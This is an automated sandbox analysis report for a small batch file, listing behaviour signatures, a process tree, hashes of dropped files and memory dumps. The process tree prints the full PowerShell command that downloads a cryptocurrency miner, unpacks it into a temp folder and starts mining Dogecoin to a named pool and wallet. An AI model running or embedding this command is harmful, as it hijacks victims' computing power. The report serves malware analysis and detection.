b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1793s
max time network
1804s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
03/02/2024, 03:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
10	5044	powershell.exe
12	5044	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2260	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
5044	powershell.exe
5044	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	5044	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3744 wrote to memory of 5044	3744	cmd.exe	85
PID 3744 wrote to memory of 5044	3744	cmd.exe	85
PID 5044 wrote to memory of 3560	5044	powershell.exe	94
PID 5044 wrote to memory of 3560	5044	powershell.exe	94
PID 3560 wrote to memory of 2260	3560	cmd.exe	96
PID 3560 wrote to memory of 2260	3560	cmd.exe	96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5044
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3560
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2260

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pwg1lbyy.otm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
507KB

MD5
95e06ecc2da194ea65ac5f846331efa7

SHA1
8a9f53fec35e901ba3a181d17d151bef63829300

SHA256
7bb0f84b2ae3ec64b9ff7375d2bc86d46988d9dd08d751f306aa3cf9434ce129

SHA512
b94c642575ab7dbc1de5fee8b3cb560ba0a5045448395eddf6231427cdfa04add7c3796a1d3f2c9b07da2b342d3b79695c2412cb2ce0f1e4723b17f34bd6d9c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
267KB

MD5
7ed5b443ebbb6fb6bf5deb779a31b8ca

SHA1
67f42a7e4c6a0c20eb02c993cdb75c274e10a0b5

SHA256
a5f0f72da4c572a0761a1decc11a6bd72bee578cb46daea089062dfc812f746e

SHA512
5d7a8b9b2d7241ba6c15856dffdd7b6445efa16882258d100d7b91bdbf25e9709bdd80b901fe629410b1cc8672c7b3ae6a2cb35cfc860f25704dc09d9d11fa22

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
199KB

MD5
5fa6de0505be34131ff98d1f36d8473d

SHA1
d251d9d3330e68b8c1688592fd5f0dd48745df7d

SHA256
108225011ee6c99a21b8cf9ab72d9915fe38ec032dddfda8f2679f2226911e70

SHA512
c463ddfceb8d70859be2f8ba93877c3c3823aad35ae4e34c11d5ae5bd57d44d8d02e0479e2fbc51d974d6a3791be9bfc9af456db615b3774bc37f4a47089b643

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
125KB

MD5
20d80611a3bfe2c411debc261f462bfa

SHA1
443b598c493b328f11246d8aeacb7494c2ac226d

SHA256
9f8cdfb7480fe75034619a40517d25c4d5dec22f31cac6bd39681b48b996b399

SHA512
af3889b79f0173a1c758538062601c0d413d644d7d43c5b3f1356e540c9fa60dcab0658f336de1be6ddc9e603f213d8b19b378ad55a7aa5a9400067bb916496b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
334KB

MD5
8f78a350e61f9f7f6667560b7110c9b3

SHA1
4d94228e9143c8842c23e94b39b8a5942d29e31a

SHA256
48307c39a415dc599b9f448e75d986c11e4e7c71e39202b2770488e82091d861

SHA512
2701063e0c26e1867769b762543ee17453b13bddb14fad56b8c9283dab5851c352b979a5398cee705bb52051ef95e0784f048dd7d2259144a179fc63324955d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
113KB

MD5
dd5df3afd33e921b98228ee77d96ef06

SHA1
67ae53f9ec24abd12be9b6541b56cd897535ae5c

SHA256
9701c8a3faa462a998e1bdc70d6c9add58ce6fceaba0e57b47f8cda038084019

SHA512
d1080575e143c2d5b8f0e084d3d85657f570ee6a4629605cf4f1decf278b3586b21b0a50f6ce9f56c4407702b92eaee9ea751339a31712d6abcb5cc44e1b2563

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
317KB

MD5
02aaf203fad6235cc91b39eae0c7a287

SHA1
d9ecedafd3dcc2459de62a068acbd1faa1a21f82

SHA256
feb39925c182fc96848b1c1bc2655cfd134ba219e76b3b8282f247b04053b07f

SHA512
62984327303ec9a5c707684c66b296df210c0c11f2c683462d864b98766113695a00de7af1307e3a6cfb27d0b455b697f82e38c6e490af98ee0ab815daaf50b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.0MB

MD5
cce92ab280ecc3c1cbd53b4e3c4aaaee

SHA1
95f555a425ca2dd726e42913adc5012f493398ee

SHA256
62744366b5d3dd4989892419f45fbd2aa0c34448160b673ff4430f006cb8fcc8

SHA512
482c0d2ceb980985ac6257e9274261c8c9016a367dfcca5e1dec9da22fb974bbf79ac7d9df0ad0381f90d2b768d81a5039a2a9765b57ceffcfa67710f8dff6b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
716KB

MD5
878d1ae78a322f15e5dac720828254c7

SHA1
555261001ccc2aa0feec5e696fb172c5838870d8

SHA256
befb15134ebce5b8c1d965f75980509adf956ce5c093d88830aa2e23487d0757

SHA512
40d3b9f7bbef63171090bb735927334fdf57ac9047d21dcf1b350974c04cebfeac25300e04059f80199a6ff221bea10c4b93e41d8c29e5578c825988cf19b016

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
94KB

MD5
373afd9b72355d0ad30924a69374c71c

SHA1
9d2a3ba3c852f42dfff2ba3f0f28a673e48e869e

SHA256
e8ca4986566648892fd6cb1b3a9d43ca0a6a9c1dc7f0eca66af9693bff3ce2a9

SHA512
ae79d1771e8cb75c939341263767abca877a6bdcef640f94fadb228a9b6e14eda773b4c27588774779b869310233a0e33dfef71f0fea09dcd68a1e0db440e6de

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
92KB

MD5
a6839c937d2938fad2fa3495b65f6284

SHA1
35fbeb0d43dcbc146be8dcb48382ac8f5248b796

SHA256
1780e0333b7b76f454e77f11a3f96f52a5c08ae315b7df86ff5dc0c49bc2a904

SHA512
103ea0c713aa1622d90cf80017f485a54170cf298cb743eaa46457f020d678eb3674bf9cbb6eb2824b0aaaa104ed278770a0ed3b6dc4b0f4cdbc60bed4052194

Download Submit
memory/2260-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-74-0x000000005E3E0000-0x000000005E478000-memory.dmp

Filesize
608KB

Download
memory/2260-121-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-75-0x0000000001040000-0x00000000028F5000-memory.dmp

Filesize
24.7MB

Download
memory/2260-72-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2260-73-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5044-15-0x0000022EB4F90000-0x0000022EB4FA0000-memory.dmp

Filesize
64KB

Download
memory/5044-10-0x00007FFC6F9B0000-0x00007FFC70471000-memory.dmp

Filesize
10.8MB

Download
memory/5044-11-0x0000022EB4F90000-0x0000022EB4FA0000-memory.dmp

Filesize
64KB

Download
memory/5044-0-0x0000022EB7080000-0x0000022EB70A2000-memory.dmp

Filesize
136KB

Download
memory/5044-12-0x0000022EB4F90000-0x0000022EB4FA0000-memory.dmp

Filesize
64KB

Download
memory/5044-13-0x0000022EB4F90000-0x0000022EB4FA0000-memory.dmp

Filesize
64KB

Download
memory/5044-14-0x00007FFC6F9B0000-0x00007FFC70471000-memory.dmp

Filesize
10.8MB

Download
memory/5044-58-0x00007FFC6F9B0000-0x00007FFC70471000-memory.dmp

Filesize
10.8MB

Download
memory/5044-16-0x0000022EB4F90000-0x0000022EB4FA0000-memory.dmp

Filesize
64KB

Download
memory/5044-17-0x0000022EB4F90000-0x0000022EB4FA0000-memory.dmp

Filesize
64KB

Download
memory/5044-19-0x0000022EB7540000-0x0000022EB7552000-memory.dmp

Filesize
72KB

Download
memory/5044-20-0x0000022EB7530000-0x0000022EB753A000-memory.dmp

Filesize
40KB

Download